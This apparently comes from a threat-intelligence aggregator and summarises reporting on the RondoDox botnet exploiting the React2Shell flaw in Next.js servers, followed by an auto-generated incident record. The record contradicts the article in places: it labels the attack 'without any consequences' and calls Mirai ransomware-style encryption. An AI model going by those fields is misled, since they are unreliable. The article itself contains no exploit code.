Fortinet and CloudSEK: RondoDox botnet exploits React2Shell flaw to breach Next.js servers

**RondoDox Botnet Exploits React2Shell Flaw to Infect Next.js Servers with Malware**

The RondoDox botnet, first documented by Fortinet in July 2025, has been actively exploiting the React2Shell vulnerability (CVE-2025-55182) to compromise Next.js servers with malware and cryptominers. This unauthenticated remote code execution (RCE) flaw, affecting frameworks using the React Server Components (RSC) 'Flight' protocol, allows attackers to breach systems via a single HTTP request.

In December 2025, cybersecurity firm CloudSEK observed RondoDox scanning for vulnerable Next.js servers starting December 8, with active exploitation beginning three days later. The botnet has since launched over 40 exploit attempts in just six days, targeting exposed assets—over 94,000 of which were identified by the Shadowserver Foundation as of December 30.

RondoDox has evolved through three operational phases in 2025:

• March–April: Reconnaissance and vulnerability testing
• April–June: Automated web application exploitation
• July–Present: Large-scale IoT botnet deployment, targeting Linksys, Wavlink, and other routers in hourly waves.

Once a server is compromised, RondoDox deploys multiple payloads, including:

• A cryptominer (/nuts/poop)
• A botnet loader and health checker (/nuts/bolts), which removes competing malware, enforces persistence via /etc/crontab, and terminates non-whitelisted processes every 45 seconds
• A Mirai variant (/nuts/x86)

The React2Shell flaw has also been exploited by North Korean hackers, who used it to deploy EtherRAT, a new malware family. The widespread targeting underscores the vulnerability’s severity in both enterprise and consumer environments.

Source: https://www.bleepingcomputer.com/news/security/rondodox-botnet-exploits-react2shell-flaw-to-breach-nextjs-servers/

Fortinet cybersecurity rating report: https://www.rankiteo.com/company/fortinet

CloudSEK cybersecurity rating report: https://www.rankiteo.com/company/cloudsek

"id": "FORCLO1767196505",
"linkid": "fortinet, cloudsek",
"type": "Vulnerability",
"date": "12/2025",
"severity": "25",
"impact": "1",
"explanation": "Attack without any consequences"

{'affected_entities': [{'industry': 'Technology, Enterprise, Consumer '
                                    'Electronics',
                        'location': 'Global',
                        'type': 'Web Application Servers, IoT Devices'}],
 'attack_vector': 'Exploitation of React2Shell (CVE-2025-55182) via HTTP '
                  'request',
 'data_breach': {'data_encryption': 'Data encrypted by Mirai variants'},
 'date_detected': '2025-12-08',
 'date_publicly_disclosed': '2025-07',
 'description': 'The RondoDox botnet has been observed exploiting the critical '
                'React2Shell flaw (CVE-2025-55182) to infect vulnerable '
                'Next.js servers with malware and cryptominers. The botnet '
                'conducts large-scale IoT exploitation and deploys payloads '
                'including coinminers, botnet loaders, and Mirai variants.',
 'impact': {'operational_impact': 'Process termination, persistence '
                                  'enforcement, removal of competing malware',
            'systems_affected': 'Next.js servers, IoT devices (Linksys, '
                                'Wavlink routers), enterprise routers'},
 'initial_access_broker': {'entry_point': 'React2Shell (CVE-2025-55182), IoT '
                                          'devices (Linksys, Wavlink routers)',
                           'reconnaissance_period': 'March to April 2025'},
 'investigation_status': 'Ongoing',
 'motivation': 'Financial gain (cryptomining), botnet expansion, data '
               'exfiltration',
 'post_incident_analysis': {'corrective_actions': 'Patching vulnerable '
                                                  'systems, network '
                                                  'segmentation, enhanced '
                                                  'monitoring',
                            'root_causes': 'Exploitation of unpatched '
                                           'React2Shell vulnerability, lack of '
                                           'IoT device segmentation'},
 'ransomware': {'data_encryption': 'Mirai variant encryption'},
 'recommendations': ['Audit and patch Next.js Server Actions',
                     'Isolate IoT devices into dedicated virtual LANs',
                     'Monitor for suspicious processes being executed'],
 'references': [{'date_accessed': '2025-12-30', 'source': 'CloudSEK'},
                {'date_accessed': '2025-07', 'source': 'Fortinet'},
                {'date_accessed': '2025-11', 'source': 'VulnCheck'},
                {'date_accessed': '2025-12-30',
                 'source': 'Shadowserver Foundation'}],
 'response': {'enhanced_monitoring': 'Monitoring for suspicious processes',
              'network_segmentation': 'Isolating IoT devices into dedicated '
                                      'VLANs',
              'remediation_measures': 'Auditing and patching Next.js Server '
                                      'Actions, isolating IoT devices into '
                                      'dedicated VLANs, monitoring for '
                                      'suspicious processes',
              'third_party_assistance': 'CloudSEK, Fortinet, VulnCheck, '
                                        'Shadowserver Foundation'},
 'threat_actor': 'RondoDox Botnet',
 'title': 'RondoDox Botnet Exploits React2Shell (CVE-2025-55182) to Infect '
          'Next.js Servers',
 'type': 'Botnet Infection, Cryptojacking, Remote Code Execution (RCE)',
 'vulnerability_exploited': 'React2Shell (CVE-2025-55182), CVE-2025-24893'}